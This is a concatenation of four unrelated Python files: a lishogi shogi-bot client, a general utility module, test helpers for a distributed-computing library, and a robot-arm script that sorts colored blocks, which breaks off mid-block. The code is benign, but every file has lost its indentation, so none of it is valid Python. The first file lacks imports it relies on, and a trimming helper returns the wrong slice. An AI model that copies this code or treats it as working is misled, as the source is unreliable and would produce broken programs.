from requests.exceptions import ChunkedEncodingError, ConnectionError, HTTPError, ReadTimeout
from urllib3.exceptions import ProtocolError
import os
import threading
from util import makeusi
from util import switchusiuci
logger = logging.getLogger(__name__)
try:
from http.client import RemoteDisconnected
# New in version 3.5: Previously, BadStatusLine('') was raised.
except ImportError:
from http.client import BadStatusLine as RemoteDisconnected
__version__ = "0.6.0"
terminated = False
def signal_handler(signal, frame):
global terminated
logger.debug("Recieved SIGINT. Terminating client.")
terminated = True
signal.signal(signal.SIGINT, signal_handler)
def is_final(exception):
return isinstance(exception, HTTPError) and exception.response.status_code < 500
def upgrade_account(li):
if li.upgrade_to_bot_account() is None:
return False
logger.info("Succesfully upgraded to Bot Account!")
return True
def watch_control_stream(control_queue, li):
logger.info("start")
while not terminated:
try:
response = li.get_event_stream()
lines = response.iter_lines()
for line in lines:
if line:
event = json.loads(line.decode('utf-8'))
control_queue.put_nowait(event)
logger.info(event)
except:
logger.info("except")
pass
def start(li, user_profile, engine_factory, config):
challenge_config = config["challenge"]
max_games = challenge_config.get("concurrency", 1)
logger.info("You're now connected to {} and awaiting challenges.".format(config["url"]))
control_queue=multiprocessing.Manager().Queue()
control_stream = Process(target=watch_control_stream, args=[control_queue,li])
control_stream.start()
gamesip=[]
while not terminated:
event=control_queue.get()
if event["type"] == "terminated":
break
elif event["type"] == "challenge":
logger.info("chlng detected")
chlng = model.Challenge(event["challenge"])
if chlng.is_supported(challenge_config):
logger.info("chlng supported")
try:
logger.info(" Accept {}".format(chlng))
response = li.accept_challenge(chlng.id)
logger.info(chlng.id)
except (HTTPError, ReadTimeout) as exception:
if isinstance(exception, HTTPError) and exception.response.status_code == 404: # ignore missing challenge
logger.info(" Skip missing {}".format(chlng))
else:
try:
li.decline_challenge(chlng.id)
logger.info(" Decline {}".format(chlng))
except:
pass
elif event["type"] == "gameStart":
logger.info("game detected")
game_id = event["game"]["id"]
gamesip.append(threading.Thread(target=play_game,args=(li, game_id, engine_factory, user_profile, config,)))
gamesip[-1].start()
logger.info("Terminated")
control_stream.terminate()
control_stream.join()
ponder_results = {}
@backoff.on_exception(backoff.expo, BaseException, max_time=600, giveup=is_final)
def play_game(li, game_id, engine_factory, user_profile, config):
response = li.get_game_stream(game_id)
lines = response.iter_lines()
bullet=False
#Initial response of stream will be the full game info. Store it
initial_state = json.loads(next(lines).decode('utf-8'))
game = model.Game(initial_state, user_profile["username"], li.baseUrl, config.get("abort_time", 20))
board = setup_board(game)
cfg = config["engine"]
engineeng = engine_factory(board)
logger.info("+++ {}".format(game))
if is_engine_move(game,board.move_stack) and not is_game_over(game):
move=engineeng.search(board,5000,5000,1,1)
finalmove=switchusiuci(move)
board.push(shogi.Move.from_usi(move))
li.make_move(game.id, finalmove)
while not terminated:
try:
binary_chunk = next(lines)
except(StopIteration):
break
upd = json.loads(binary_chunk.decode('utf-8')) if binary_chunk else None
u_type = upd["type"] if upd else "ping"
if not board.is_game_over():
if u_type == "gameState":
game.state=upd
moves = upd["moves"].split()
board = update_board(board, moves[-1])
if not is_game_over(game) and is_engine_move(game, moves):
move=engineeng.search(board,upd['wtime'],upd['btime'],upd['winc'],upd['binc'])
finalmove=switchusiuci(move)
board.push(shogi.Move.from_usi(move))
li.make_move(game.id, finalmove)
if board.turn == shogi.BLACK:
game.ping(config.get("abort_time", 20), (upd["btime"] + upd["binc"]) / 1000 + 60)
else:
game.ping(config.get("abort_time", 20), (upd["wtime"] + upd["winc"]) / 1000 + 60)
elif u_type == "ping":
if game.should_abort_now():
logger.info(" Aborting {} by lack of activity".format(game.url()))
li.abort(game.id)
break
elif game.should_terminate_now():
logger.info(" Terminating {} by lack of activity".format(game.url()))
if game.is_abortable():
li.abort(game.id)
break
else:
logger.info("game over")
engineeng.quit()
break
def is_white_to_move(game, moves):
return len(moves) % 2 == (0 if game.white_starts else 1)
def setup_board(game):
if game.variant_name == "From Position":
board = shogi.Board(makesfenfromfen(game.initial_fen))
else:
board = shogi.Board() # Standard
moves = game.state["moves"].split()
for move in moves:
board = update_board(board, move)
return board
def is_engine_move(game, moves):
return game.is_white == is_white_to_move(game, moves)
def is_game_over(game):
return game.state["status"] != "started"
def update_board(board, move):
usi_move = shogi.Move.from_usi(makeusi(move))
if board.is_legal(usi_move):
board.push(usi_move)
else:
logger.debug('Ignoring illegal move {} on board {}'.format(makeusi(move), board.sfen()))
return board
def intro():
return r"""
. _/\_
. //o o\\
. || || lishogi-bot %s
. || ||
. ||____|| Play on Lishogi with a bot
""" % __version__
if __name__=="__main__":
parser = argparse.ArgumentParser(description='Play on Lishogi with a bot')
parser.add_argument('-u', action='store_true', help='Add this flag to upgrade your account to a bot account.')
parser.add_argument('-v', action='store_true', help='Verbose output. Changes log level from INFO to DEBUG.')
parser.add_argument('--config', help='Specify a configuration file (defaults to ./config.yml)')
parser.add_argument('-l', '--logfile', help="Log file to append logs to.", default=None)
args = parser.parse_args()
logging.basicConfig(level=logging.DEBUG if args.v else logging.INFO, filename=args.logfile,
format="%(asctime)-15s: %(message)s")
logger.info(intro())
CONFIG = load_config(args.config or "./config.yml")
li = lishogi.Lishogi(CONFIG["token"], CONFIG["url"], __version__)
user_profile = li.get_profile()
username = user_profile["username"]
is_bot = user_profile.get("title") == "BOT"
logger.info("Welcome {}!".format(username))
if is_bot is False:
is_bot = upgrade_account(li)
if is_bot:
engine_factory = partial(engine_wrapper.create_engine, CONFIG)
start(li, user_profile, engine_factory, CONFIG)
else:
logger.error("{} is not a bot account. Please upgrade it to a bot account!".format(user_profile["username"]))
|
common.py
|
# -*- coding: utf-8 -*-
import json, subprocess, threading, sys, platform, os
PY3 = sys.version_info[0] == 3
JsonLoads = PY3 and json.loads or (lambda s: encJson(json.loads(s)))
JsonDumps = json.dumps
def STR2BYTES(s):
return s.encode('utf8') if PY3 else s
def BYTES2STR(b):
return b.decode('utf8') if PY3 else b
def BYTES2SYSTEMSTR(b):
return b.decode('utf8') if PY3 else \
b.decode('utf8').encode(sys.stdin.encoding)
def STR2SYSTEMSTR(s):
return s if PY3 else s.decode('utf8').encode(sys.stdin.encoding)
#def STRING_ESCAPE(s):
# if not PY3:
# return s.decode('string-escape')
# else:
# return s.encode('utf8').decode('unicode_escape')
if not PY3:
def encJson(obj):
if hasattr(obj, 'encode'):
return obj.encode('utf8')
elif isinstance(obj, list):
return [encJson(e) for e in obj]
elif isinstance(obj, dict):
return dict((encJson(k), encJson(v)) for k,v in obj.items())
else:
return obj
def Partition(msg, n):
n = n * 3
if n >= len(msg):
return msg, ''
else:
# All utf8 characters start with '0xxx-xxxx' or '11xx-xxxx'
while n > 0 and ord(msg[n]) >> 6 == 2:
n -= 1
return msg[:n], msg[n:]
else:
def Partition(msg, n):
return msg[:n], msg[n:]
#_p = re.compile(r'[0-9]+|[a-zA-Z][a-z]*')
#
#def SplitWords(s):
# return _p.findall(s)
#
#def MinusSeperate(s):
# return '-'.join(SplitWords(s)).lower()
def HasCommand(procName):
return subprocess.call(['which', procName], stdout=subprocess.PIPE) == 0
#def StartThread(target, *args, **kwargs):
# threading.Thread(target=target, args=args, kwargs=kwargs).start()
def StartDaemonThread(target, *args, **kwargs):
t = threading.Thread(target=target, args=args, kwargs=kwargs)
t.daemon = True
t.start()
class LockedValue(object):
def __init__(self, initialVal=None):
self.val = initialVal
self.lock = threading.Lock()
def setVal(self, val):
with self.lock:
self.val = val
def getVal(self):
with self.lock:
val = self.val
return val
# usage: CallInNewConsole(['python', 'qterm.py'])
def CallInNewConsole(args=None):
args = sys.argv[1:] if args is None else args
if not args:
return 1
osName = platform.system()
if osName == 'Windows':
return subprocess.call(['start'] + list(args), shell=True)
elif osName == 'Linux':
cmd = subprocess.list2cmdline(args)
if HasCommand('mate-terminal'):
args = ['mate-terminal', '-e', cmd]
elif HasCommand('gnome-terminal'):
args = ['gnome-terminal', '-e', cmd]
elif HasCommand('xterm'):
args = ['sh', '-c', 'xterm -e %s &' % cmd]
else:
return 1
# args = ['sh', '-c', 'nohup %s >/dev/null 2>&1 &' % cmd]
return subprocess.call(args, preexec_fn=os.setpgrp)
elif osName == 'Darwin':
return subprocess.call(['open','-W','-a','Terminal.app'] + list(args))
else:
return 1
# return subprocess.Popen(list(args) + ['&'])
if PY3:
import queue as Queue
else:
import Queue
class DotDict(object):
def __init__(self, **kw):
self.__dict__.update(**kw)
Pass = lambda *arg, **kwargs: None
def LeftTrim(s, head):
if s.startswith(head):
return s[:len(head)]
else:
return s
def AutoTest():
with open(sys.argv[1], 'rb') as f:
for line in f.read().split(b'\n'):
line = BYTES2SYSTEMSTR(line.strip())
if not line:
continue
elif line.startswith('#'):
print(line)
else:
print('>>> '+line)
os.system(line)
sys.stdout.write('\npress enter to continue...')
if PY3:
input()
else:
raw_input()
sys.stdout.write('\n')
if not PY3:
import HTMLParser; htmlUnescape = HTMLParser.HTMLParser().unescape
def HTMLUnescape(s):
s = s.replace(' ', ' ')
return htmlUnescape(s.decode('utf8')).encode('utf8')
else:
import html.parser; htmlUnescape = html.parser.HTMLParser().unescape
def HTMLUnescape(s):
return htmlUnescape(s.replace(' ', ' '))
def IsMainThread():
return threading.current_thread().name == 'MainThread'
if PY3:
import importlib
reload = importlib.reload
# import module / import package.module
# Import('module') / Import('package.module')
def Import(moduleName):
if moduleName in sys.modules:
reload(sys.modules[moduleName])
else:
__import__(moduleName)
return sys.modules[moduleName]
if not PY3:
import urllib
Unquote = urllib.unquote
else:
import urllib.parse
Unquote = urllib.parse.unquote
|
utils_test.py
|
from __future__ import print_function, division, absolute_import
from contextlib import contextmanager
from glob import glob
import logging
from multiprocessing import Process, Queue
import os
import shutil
import signal
import socket
from subprocess import Popen, PIPE
import sys
from time import time, sleep
import uuid
from toolz import merge
from tornado import gen
from tornado.ioloop import IOLoop, TimeoutError
from tornado.iostream import StreamClosedError
from .core import connect, read, write, rpc
from .utils import ignoring, log_errors, sync
import pytest
logger = logging.getLogger(__name__)
@pytest.yield_fixture
def current_loop():
IOLoop.clear_instance()
loop = IOLoop()
loop.make_current()
yield loop
if loop._running:
sync(loop, loop.stop)
for i in range(5):
try:
loop.close(all_fds=True)
return
except Exception as e:
f = e
print(f)
IOLoop.clear_instance()
@pytest.yield_fixture
def loop():
loop = IOLoop()
yield loop
if loop._running:
sync(loop, loop.stop)
for i in range(5):
try:
loop.close(all_fds=True)
return
except Exception as e:
f = e
print(f)
def inc(x):
return x + 1
def dec(x):
return x - 1
def div(x, y):
return x / y
def deep(n):
if n > 0:
return deep(n - 1)
else:
return True
def throws(x):
raise Exception('hello!')
def double(x):
return x * 2
def slowinc(x, delay=0.02):
from time import sleep
sleep(delay)
return x + 1
def randominc(x, scale=1):
from time import sleep
from random import random
sleep(random() * scale)
return x + 1
def slowadd(x, y):
from time import sleep
sleep(0.02)
return x + y
def run_center(q):
from distributed import Center
from tornado.ioloop import IOLoop, PeriodicCallback
import logging
# IOLoop.clear_instance()
loop = IOLoop(); loop.make_current()
PeriodicCallback(lambda: None, 500).start()
logging.getLogger("tornado").setLevel(logging.CRITICAL)
center = Center('127.0.0.1')
while True:
try:
center.listen(0)
break
except Exception as e:
logging.info("Could not start center on port. Retrying",
exc_info=True)
q.put(center.port)
try:
loop.start()
finally:
loop.close(all_fds=True)
def run_scheduler(q, scheduler_port=0, center_port=None, **kwargs):
from distributed import Scheduler
from tornado.ioloop import IOLoop, PeriodicCallback
import logging
IOLoop.clear_instance()
loop = IOLoop(); loop.make_current()
PeriodicCallback(lambda: None, 500).start()
logging.getLogger("tornado").setLevel(logging.CRITICAL)
center = ('127.0.0.1', center_port) if center_port else None
scheduler = Scheduler(center=center, loop=loop, **kwargs)
done = scheduler.start(scheduler_port)
q.put(scheduler.port)
try:
loop.start()
finally:
loop.close(all_fds=True)
def run_worker(q, center_port, **kwargs):
from distributed import Worker
from tornado.ioloop import IOLoop, PeriodicCallback
import logging
with log_errors():
IOLoop.clear_instance()
loop = IOLoop(); loop.make_current()
PeriodicCallback(lambda: None, 500).start()
logging.getLogger("tornado").setLevel(logging.CRITICAL)
worker = Worker('127.0.0.1', center_port, ip='127.0.0.1', loop=loop, **kwargs)
loop.run_sync(lambda: worker._start(0))
q.put(worker.port)
try:
loop.start()
finally:
loop.close(all_fds=True)
def run_nanny(q, center_port, **kwargs):
from distributed import Nanny
from tornado.ioloop import IOLoop, PeriodicCallback
import logging
with log_errors():
IOLoop.clear_instance()
loop = IOLoop(); loop.make_current()
PeriodicCallback(lambda: None, 500).start()
logging.getLogger("tornado").setLevel(logging.CRITICAL)
worker = Nanny('127.0.0.1', center_port, ip='127.0.0.1', loop=loop, **kwargs)
loop.run_sync(lambda: worker._start(0))
q.put(worker.port)
try:
loop.start()
finally:
loop.run_sync(worker._close)
loop.close(all_fds=True)
@contextmanager
def cluster(nworkers=2, nanny=False, worker_kwargs={}):
if nanny:
_run_worker = run_nanny
else:
_run_worker = run_worker
scheduler_q = Queue()
scheduler = Process(target=run_scheduler, args=(scheduler_q,))
scheduler.daemon = True
scheduler.start()
sport = scheduler_q.get()
workers = []
for i in range(nworkers):
q = Queue()
fn = '_test_worker-%s' % uuid.uuid1()
proc = Process(target=_run_worker, args=(q, sport),
kwargs=merge({'ncores': 1, 'local_dir': fn},
worker_kwargs))
workers.append({'proc': proc, 'queue': q, 'dir': fn})
for worker in workers:
worker['proc'].start()
for worker in workers:
worker['port'] = worker['queue'].get()
loop = IOLoop()
s = rpc(ip='127.0.0.1', port=sport)
start = time()
try:
while True:
ncores = loop.run_sync(s.ncores)
if len(ncores) == nworkers:
break
if time() - start > 5:
raise Exception("Timeout on cluster creation")
yield {'proc': scheduler, 'port': sport}, workers
finally:
logger.debug("Closing out test cluster")
with ignoring(socket.error, TimeoutError, StreamClosedError):
loop.run_sync(lambda: disconnect('127.0.0.1', sport), timeout=0.5)
scheduler.terminate()
scheduler.join(timeout=2)
for port in [w['port'] for w in workers]:
with ignoring(socket.error, TimeoutError, StreamClosedError):
loop.run_sync(lambda: disconnect('127.0.0.1', port),
timeout=0.5)
for proc in [w['proc'] for w in workers]:
with ignoring(Exception):
proc.terminate()
proc.join(timeout=2)
for q in [w['queue'] for w in workers]:
q.close()
for fn in glob('_test_worker-*'):
shutil.rmtree(fn)
loop.close(all_fds=True)
@contextmanager
def cluster_center(nworkers=2, nanny=False):
if nanny:
_run_worker = run_nanny
else:
_run_worker = run_worker
center_q = Queue()
center = Process(target=run_center, args=(center_q,))
center.daemon = True
center.start()
cport = center_q.get()
workers = []
for i in range(nworkers):
q = Queue()
fn = '_test_worker-%s' % uuid.uuid1()
proc = Process(target=_run_worker, args=(q, cport),
kwargs={'ncores': 1, 'local_dir': fn})
workers.append({'proc': proc, 'queue': q, 'dir': fn})
for worker in workers:
worker['proc'].start()
for worker in workers:
worker['port'] = worker['queue'].get()
loop = IOLoop()
c = rpc(ip='127.0.0.1', port=cport)
start = time()
try:
while True:
ncores = loop.run_sync(c.ncores)
if len(ncores) == nworkers:
break
if time() - start > 5:
raise Exception("Timeout on cluster creation")
yield {'proc': center, 'port': cport}, workers
finally:
logger.debug("Closing out test cluster")
for port in [cport] + [w['port'] for w in workers]:
with ignoring(socket.error, TimeoutError, StreamClosedError):
loop.run_sync(lambda: disconnect('127.0.0.1', port),
timeout=0.5)
for proc in [center] + [w['proc'] for w in workers]:
with ignoring(Exception):
proc.terminate()
for proc in [center] + [w['proc'] for w in workers]:
with ignoring(Exception):
proc.join(timeout=5)
for fn in glob('_test_worker-*'):
shutil.rmtree(fn)
@gen.coroutine
def disconnect(ip, port):
stream = yield connect(ip, port)
try:
yield write(stream, {'op': 'terminate', 'close': True})
response = yield read(stream)
finally:
stream.close()
import pytest
try:
slow = pytest.mark.skipif(
not pytest.config.getoption("--runslow"),
reason="need --runslow option to run")
except AttributeError:
def slow(*args):
pass
from tornado import gen
from tornado.ioloop import IOLoop
def _test_cluster(f, loop=None, b_ip='127.0.0.1'):
from .center import Center
from .worker import Worker
from .executor import _global_executor
@gen.coroutine
def g():
c = Center('127.0.0.1')
c.listen(0)
a = Worker(c.ip, c.port, ncores=2, ip='127.0.0.1')
yield a._start()
b = Worker(c.ip, c.port, ncores=1, ip=b_ip)
yield b._start()
start = time()
try:
while len(c.ncores) < 2:
yield gen.sleep(0.01)
if time() - start > 5:
raise Exception("Cluster creation timeout")
yield f(c, a, b)
except Exception as e:
logger.exception(e)
raise
finally:
logger.debug("Closing out test cluster")
for w in [a, b]:
with ignoring(TimeoutError, StreamClosedError, OSError):
yield w._close()
if os.path.exists(w.local_dir):
shutil.rmtree(w.local_dir)
c.stop()
loop = loop or IOLoop.current()
loop.run_sync(g)
_global_executor[0] = None
def _test_scheduler(f, loop=None, b_ip='127.0.0.1'):
from .scheduler import Scheduler
from .worker import Worker
from .executor import _global_executor
@gen.coroutine
def g():
s = Scheduler(ip='127.0.0.1')
done = s.start(0)
a = Worker('127.0.0.1', s.port, ncores=2, ip='127.0.0.1')
yield a._start()
b = Worker('127.0.0.1', s.port, ncores=1, ip=b_ip)
yield b._start()
start = time()
try:
while len(s.ncores) < 2:
yield gen.sleep(0.01)
if time() - start > 5:
raise Exception("Cluster creation timeout")
yield f(s, a, b)
finally:
logger.debug("Closing out test cluster")
yield s.close()
for w in [a, b]:
with ignoring(TimeoutError, StreamClosedError, OSError):
yield w._close()
if os.path.exists(w.local_dir):
shutil.rmtree(w.local_dir)
loop = loop or IOLoop.current()
loop.run_sync(g)
_global_executor[0] = None
def gen_test(timeout=10):
""" Coroutine test
@gen_test(timeout=5)
def test_foo():
yield ... # use tornado coroutines
"""
def _(func):
def test_func():
IOLoop.clear_instance()
loop = IOLoop()
loop.make_current()
cor = gen.coroutine(func)
try:
loop.run_sync(cor, timeout=timeout)
finally:
loop.stop()
loop.close(all_fds=True)
return test_func
return _
from .scheduler import Scheduler
from .worker import Worker
from .executor import Executor
@gen.coroutine
def start_cluster(ncores, loop, Worker=Worker):
s = Scheduler(ip='127.0.0.1', loop=loop)
done = s.start(0)
workers = [Worker(s.ip, s.port, ncores=v, ip=k, name=i, loop=loop)
for i, (k, v) in enumerate(ncores)]
yield [w._start() for w in workers]
start = time()
while len(s.ncores) < len(ncores):
yield gen.sleep(0.01)
if time() - start > 5:
raise Exception("Cluster creation timeout")
raise gen.Return((s, workers))
@gen.coroutine
def end_cluster(s, workers):
logger.debug("Closing out test cluster")
for w in workers:
with ignoring(TimeoutError, StreamClosedError, OSError):
yield w._close(report=False)
if w.local_dir and os.path.exists(w.local_dir):
shutil.rmtree(w.local_dir)
s.stop()
def gen_cluster(ncores=[('127.0.0.1', 1), ('127.0.0.1', 2)], timeout=10,
Worker=Worker, executor=False):
from distributed import Executor
""" Coroutine test with small cluster
@gen_cluster()
def test_foo(scheduler, worker1, worker2):
yield ... # use tornado coroutines
See also:
start
end
"""
def _(func):
cor = gen.coroutine(func)
def test_func():
IOLoop.clear_instance()
loop = IOLoop()
loop.make_current()
s, workers = loop.run_sync(lambda: start_cluster(ncores, loop,
Worker=Worker))
args = [s] + workers
if executor:
e = Executor((s.ip, s.port), loop=loop, start=False)
loop.run_sync(e._start)
args = [e] + args
try:
loop.run_sync(lambda: cor(*args), timeout=timeout)
finally:
if executor:
loop.run_sync(e._shutdown)
loop.run_sync(lambda: end_cluster(s, workers))
loop.stop()
loop.close(all_fds=True)
return test_func
return _
@contextmanager
def make_hdfs():
from hdfs3 import HDFileSystem
hdfs = HDFileSystem(host='localhost', port=8020)
if hdfs.exists('/tmp/test'):
hdfs.rm('/tmp/test')
hdfs.mkdir('/tmp/test')
try:
yield hdfs
finally:
if hdfs.exists('/tmp/test'):
hdfs.rm('/tmp/test')
def raises(func, exc=Exception):
try:
func()
return False
except exc:
return True
@contextmanager
def popen(*args, **kwargs):
kwargs['stdout'] = PIPE
kwargs['stderr'] = PIPE
proc = Popen(*args, **kwargs)
try:
yield proc
finally:
os.kill(proc.pid, signal.SIGINT)
if sys.version_info[0] == 3:
proc.wait(5)
else:
proc.wait()
with ignoring(OSError):
proc.terminate()
|
ColorPalletizing.py
|
#!/usr/bin/python3
# coding=utf8
import sys
sys.path.append('/home/pi/ArmPi/')
import cv2
import time
import Camera
import threading
from LABConfig import *
from ArmIK.Transform import *
from ArmIK.ArmMoveIK import *
import HiwonderSDK.Board as Board
from CameraCalibration.CalibrationConfig import *
if sys.version_info.major == 2:
print('Please run this program with python3!')
sys.exit(0)
AK = ArmIK()
range_rgb = {
'red': (0, 0, 255),
'blue': (255, 0, 0),
'green': (0, 255, 0),
'black': (0, 0, 0),
'white': (255, 255, 255),
}
__target_color = ('red', 'green', 'blue')
def setTargetColor(target_color):
global __target_color
#print("COLOR", target_color)
__target_color = target_color
return (True, ())
# 找出面积最大的轮廓
# 参数为要比较的轮廓的列表
def getAreaMaxContour(contours):
contour_area_temp = 0
contour_area_max = 0
area_max_contour = None
for c in contours: # 历遍所有轮廓
contour_area_temp = math.fabs(cv2.contourArea(c)) # 计算轮廓面积
if contour_area_temp > contour_area_max:
contour_area_max = contour_area_temp
if contour_area_temp > 300: # 只有在面积大于300时,最大面积的轮廓才是有效的,以过滤干扰
area_max_contour = c
return area_max_contour, contour_area_max # 返回最大的轮廓
# 夹持器夹取时闭合的角度
servo1 = 500
# 初始位置
def initMove():
Board.setBusServoPulse(1, servo1 - 50, 300)
Board.setBusServoPulse(2, 500, 500)
AK.setPitchRangeMoving((0, 10, 10), -30, -30, -90, 1500)
def setBuzzer(timer):
Board.setBuzzer(0)
Board.setBuzzer(1)
time.sleep(timer)
Board.setBuzzer(0)
#设置扩展板的RGB灯颜色使其跟要追踪的颜色一致
def set_rgb(color):
if color == "red":
Board.RGB.setPixelColor(0, Board.PixelColor(255, 0, 0))
Board.RGB.setPixelColor(1, Board.PixelColor(255, 0, 0))
Board.RGB.show()
elif color == "green":
Board.RGB.setPixelColor(0, Board.PixelColor(0, 255, 0))
Board.RGB.setPixelColor(1, Board.PixelColor(0, 255, 0))
Board.RGB.show()
elif color == "blue":
Board.RGB.setPixelColor(0, Board.PixelColor(0, 0, 255))
Board.RGB.setPixelColor(1, Board.PixelColor(0, 0, 255))
Board.RGB.show()
else:
Board.RGB.setPixelColor(0, Board.PixelColor(0, 0, 0))
Board.RGB.setPixelColor(1, Board.PixelColor(0, 0, 0))
Board.RGB.show()
count = 0
_stop = False
color_list = []
get_roi = False
__isRunning = False
move_square = False
detect_color = 'None'
start_pick_up = False
start_count_t1 = True
# 放置坐标
coordinate = {
'red': (-15 + 1, -7 - 0.5, 1.5),
'green': (-15 + 1, -7 - 0.5, 1.5),
'blue': (-15 + 1, -7 - 0.5, 1.5),
}
z_r = coordinate['red'][2]
z_g = coordinate['green'][2]
z_b = coordinate['blue'][2]
z = z_r
def reset():
global _stop
global count
global get_roi
global color_list
global move_square
global detect_color
global start_pick_up
global start_count_t1
global z_r, z_g, z_b, z
count = 0
_stop = False
color_list = []
get_roi = False
move_square = False
detect_color = 'None'
start_pick_up = False
start_count_t1 = True
z_r = coordinate['red'][2]
z_g = coordinate['green'][2]
z_b = coordinate['blue'][2]
z = z_r
def init():
print("ColorPalletizing Init")
initMove()
def start():
global __isRunning
reset()
__isRunning = True
print("ColorPalletizing Start")
def stop():
global _stop
global __isRunning
_stop = True
__isRunning = False
print("ColorPalletizing Stop")
def exit():
global _stop
global __isRunning
_stop = True
__isRunning = False
print("ColorPalletizing Exit")
rect = None
size = (640, 480)
rotation_angle = 0
unreachable = False
world_X, world_Y = 0, 0
def move():
global rect
global _stop
global get_roi
global move_square
global __isRunning
global unreachable
global detect_color
global start_pick_up
global rotation_angle
global world_X, world_Y
global z_r, z_g, z_b, z
dz = 2.5
while True:
if __isRunning:
if detect_color != 'None' and start_pick_up: # 如果检测到方块没有移动一段时间后,开始夹取
set_rgb(detect_color)
setBuzzer(0.1)
# 高度累加
z = z_r
z_r += dz
if z == 2 * dz + coordinate['red'][2]:
z_r = coordinate['red'][2]
if z == coordinate['red'][2]:
move_square = True
time.sleep(3)
move_square = False
result = AK.setPitchRangeMoving((world_X, world_Y, 7), -90, -90, 0) # 移到目标位置,高度5cm
if result == False:
unreachable = True
else:
unreachable = False
time.sleep(result[2]/1000)
if not __isRunning:
continue
# 计算夹持器需要旋转的角度
servo2_angle = getAngle(world_X, world_Y, rotation_angle)
Board.setBusServoPulse(1, servo1 - 280, 500) # 爪子张开
Board.setBusServoPulse(2, servo2_angle, 500)
time.sleep(0.5)
if not __isRunning:
continue
AK.setPitchRangeMoving((world_X, world_Y, 2), -90, -90, 0, 1000) # 降低高度到2cm
time.sleep(1.5)
if not __isRunning:
continue
Board.setBusServoPulse(1, servo1, 500) # 夹持器闭合
time.sleep(0.8)
if not __isRunning:
continue
Board.setBusServoPulse(2, 500, 500)
AK.setPitchRangeMoving((world_X, world_Y, 12), -90, -90, 0, 1000) # 机械臂抬起
time.sleep(1)
if not __isRunning:
continue
AK.setPitchRangeMoving((coordinate[detect_color][0], coordinate[detect_color][1], 12), -90, -90, 0, 1500)
time.sleep(1.5)
if not __isRunning:
continue
servo2_angle = getAngle(coordinate[detect_color][0], coordinate[detect_color][1], -90)
Board.setBusServoPulse(2, servo2_angle, 500)
time.sleep(0.5)
if not __isRunning:
continue
AK.setPitchRangeMoving((coordinate[detect_color][0], coordinate[detect_color][1], z + 3), -90, -90, 0, 500)
time.sleep(0.5)
if not __isRunning:
continue
AK.setPitchRangeMoving((coordinate[detect_color][0], coordinate[detect_color][1], z), -90, -90, 0, 1000)
time.sleep(0.8)
if not __isRunning:
continue
Board.setBusServoPulse(1, servo1 - 200, 500) # 爪子张开 ,放下物体
time.sleep(1)
if not __isRunning:
continue
AK.setPitchRangeMoving((coordinate[detect_color][0], coordinate[detect_color][1], 12), -90, -90, 0, 800)
time.sleep(0.8)
initMove() # 回到初始位置
time.sleep(1.5)
detect_color = 'None'
get_roi = False
start_pick_up = False
set_rgb(detect_color)
else:
if _stop:
_stop = False
Board.setBusServoPulse(1, servo1 - 70, 300)
time.sleep(0.5)
Board.setBusServoPulse(2, 500, 500)
AK.setPitchRangeMoving((0, 10, 10), -30, -30, -90, 1500)
time.sleep(1.5)
time.sleep(0.01)
# 运行子线程
th = threading.Thread(target=move)
th.setDaemon(True)
th.start()
t1 = 0
roi = ()
center_list = []
last_x, last_y = 0, 0
draw_color = range_rgb["black"]
def run(img):
global roi
global rect
global count
global get_roi
global move_square
global center_list
global unreachable
global __isRunning
global start_pick_up
global last_x, last_y
global rotation_angle
global world_X, world_Y
global start_count_t1, t1
global detect_color, draw_color, color_list
img_copy = img.copy()
img_h, img_w = img.shape[:2]
cv2.line(img, (0, int(img_h / 2)), (img_w, int(img_h / 2)), (0, 0, 200), 1)
cv2.line(img, (int(img_w / 2), 0), (int(img_w / 2), img_h), (0, 0, 200), 1)
if not __isRunning:
return img
frame_resize = cv2.resize(img_copy, size, interpolation=cv2.INTER_NEAREST)
frame_gb = cv2.GaussianBlur(frame_resize, (11, 11), 11)
#如果检测到某个区域有识别到的物体,则一直检测该区域直到没有为止
if get_roi and not start_pick_up:
get_roi = False
frame_gb = getMaskROI(frame_gb, roi, size)
frame_lab = cv2.cvtColor(frame_gb, cv2.COLOR_BGR2LAB) # 将图像转换到LAB空间
color_area_max = None
max_area = 0
areaMaxContour_max = 0
if not start_pick_up:
for i in color_range:
if i in __target_color:
frame_mask = cv2.inRange(frame_lab, color_range[i][0], color_range[i][1]) # 对原图像和掩模进行位运算
opened = cv2.morphologyEx(frame_mask, cv2.MORPH_OPEN, np.ones((6, 6), np.uint8)) # 开运算
closed = cv2.morphologyEx(opened, cv2.MORPH_CLOSE, np.ones((6, 6), np.uint8)) # 闭运算
contours = cv2.findContours(closed, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE)[-2] # 找出轮廓
areaMaxContour, area_max = getAreaMaxContour(contours) # 找出最大轮廓
if areaMaxContour is not None:
if area_max > max_area: # 找最大面积
max_area = area_max
color_area_max = i
areaMaxContour_max = areaMaxContour
if max_area > 2500: # 有找到最大面积
rect = cv2.minAreaRect(areaMaxContour_max)
box = np.int0(cv2.boxPoints(rect))
roi = getROI(box) #获取roi区域
get_roi = True
img_centerx, img_centery = getCenter(rect, roi, size, square_length) # 获取木块中心坐标
world_x, world_y = convertCoordinate(img_centerx, img_centery, size) #转换为现实世界坐标
if not start_pick_up:
cv2.drawContours(img, [box], -1, range_rgb[color_area_max], 2)
cv2.putText(img, '(' + str(world_x) + ',' + str(world_y) + ')', (min(box[0, 0], box[2, 0]), box[2, 1] - 10),
cv2.FONT_HERSHEY_SIMPLEX, 0.5, range_rgb[color_area_max], 1) #绘制中心点
distance = math.sqrt(pow(world_x - last_x, 2) + pow(world_y - last_y, 2)) #对比上次坐标来判断是否移动
last_x, last_y = world_x, world_y
if not start_pick_up:
if color_area_max == 'red': # 红色最大
color = 1
elif color_area_max == 'green': # 绿色最大
color = 2
elif color_area_max == 'blue': # 蓝色最大
color = 3
else:
color = 0
color_list.append(color)
# 累计判断
if distance < 0.5:
count += 1
center_list.extend((world_x, world_y))
if start_count_t1:
start_count_t1 = False
t1 = time.time()
if time.time() - t1 > 0.5:
rotation_angle = rect[2]
start_count_t1 = True
world_X, world_Y = np.mean(np.array(center_list).reshape(count, 2), axis=0)
center_list = []
count = 0
start_pick_up = True
else:
t1 = time.time()
start_count_t1 = True
center_list = []
count = 0
if len(color_list) == 3: # 多次判断
# 取平均值
color = int(round(np.mean(np.array(color_list))))
color_list = []
if color == 1:
detect_color = 'red'
draw_color = range_rgb["red"]
elif color == 2:
detect_color = 'green'
draw_color = range_rgb["green"]
elif color == 3:
detect_color = 'blue'
draw_color = range_rgb["blue"]
else:
detect_color = 'None'
draw_color = range_rgb["black"]
else:
if not start_pick_up:
